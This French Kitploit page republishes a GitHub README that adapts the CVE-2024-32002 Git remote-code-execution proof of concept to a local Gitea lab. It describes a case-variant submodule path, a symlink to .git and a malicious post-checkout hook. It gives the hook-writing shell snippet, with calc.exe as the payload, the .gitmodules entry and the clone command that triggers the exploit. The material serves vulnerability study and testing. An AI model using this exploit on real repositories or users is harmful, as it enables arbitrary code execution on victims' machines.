Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
running-CVE-2024-32002-locally-for-tesing — Adaptation de CVE-2024-32002 pour une exécution hors ligne et locale. | Kitploit
Outils/GitHubGitHub/chriswalker11/running-cve-2024-32002-locally-for-tesing
Analyse des VulnérabilitésExploitationExploitation d'Applications WebApprentissage et ÉducationDéveloppement de Charges UtilesLabs et Pratique
GitHubchriswalker11/running-cve-2024-32002-locally-for-tesing

running-CVE-2024-32002-locally-for-tesing

Adaptation de CVE-2024-32002 pour une exécution hors ligne et locale.

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôt
il y a 2 ansPas encore vérifié

Nous adaptons cela pour une utilisation locale

Nous suivons cet article de blog mais avec quelques différences clés : https://amalmurali.me/posts/git-rce

Comment ça fonctionne

  1. Un dépôt malveillant (git_rce) inclut un sous-module dont le chemin est spécialement conçu.
  2. Le chemin du sous-module utilise une variation de casse qui exploite le système de fichiers insensible à la casse.
  3. Le sous-module inclut un lien symbolique pointant vers son répertoire .git/, lequel contient un hook malveillant.
  4. Lorsque le dépôt est cloné, le lien symbolique est suivi et le hook malveillant est exécuté, menant à une exécution de code à distance (RCE).

Reproduction

⚠️ Avertissement : N'exécutez pas cette preuve de concept sur des systèmes qui ne vous appartiennent pas ou pour lesquels vous n'avez pas d'autorisation explicite. Des tests non autorisés pourraient entraîner des conséquences imprévues.

Nous devons créer un jeton API pour Gitea ; celui-ci se trouve à l'adresse http://<YOUR_GITEA_SERVER_IP>:3000/user/settings/applications. J'ai attribué au jeton l'accès à tout afin de garantir le bon fonctionnement de l'ensemble.

Ensuite, nous pouvons exécuter notre poc.sh en veillant à fournir les informations demandées, telles que l'adresse IP et le port du serveur Gitea, le nom d'utilisateur et le jeton pour créer les dépôts.

root@kitploit:~
Enter the IP address or FQDN (without http://): localhost:3000
Enter your username: chris
Enter your API token: 3c57dbe1756734612f457b1fa08583df64fb5ea4
Enter the name for the first repository: hook 
Enter the name for the second repository: main

Il faut également modifier les lignes 42 à 46 pour y placer la charge utile.

root@kitploit:~
# Write the malicious code to a hook
cat > y/hooks/post-checkout <<EOF
#!/bin/bash
calc.exe #or replace with other poc 
EOF

Il y a une étape supplémentaire : nous devons accéder au fichier .gitmodules du dépôt main vers le dépôt hook. Je suis allé manuellement dans le dépôt sur Gitea et j'ai modifié le fichier.

screenshot1

Et ensuite j'ai fait ceci :

root@kitploit:~
[submodule "x/y"]
	path = A/modules/x
	url = http://<your_git_tea_server>:3000/chris/hook.git

En m'assurant qu'en allant dans A/modules, je voyais quelque chose comme ceci :

screenshot2

Ensuite, en cliquant sur ce commit, cela devrait afficher l'autre dépôt contenant les éléments de la preuve de concept.

Ensuite, nous pouvons prendre notre URL et celle-ci devrait fonctionner pour déclencher l'exploit :

root@kitploit:~
git clone --recursive http://<your_git_tea_server>:3000/<your_user_name>/main.git

Remerciements

Crédit à filip-hejsek et amalmurali47 pour la découverte de cette vulnérabilité et pour avoir fourni un article de blog et un dépôt à partir desquels adapter notre travail.

Télécharger l’outil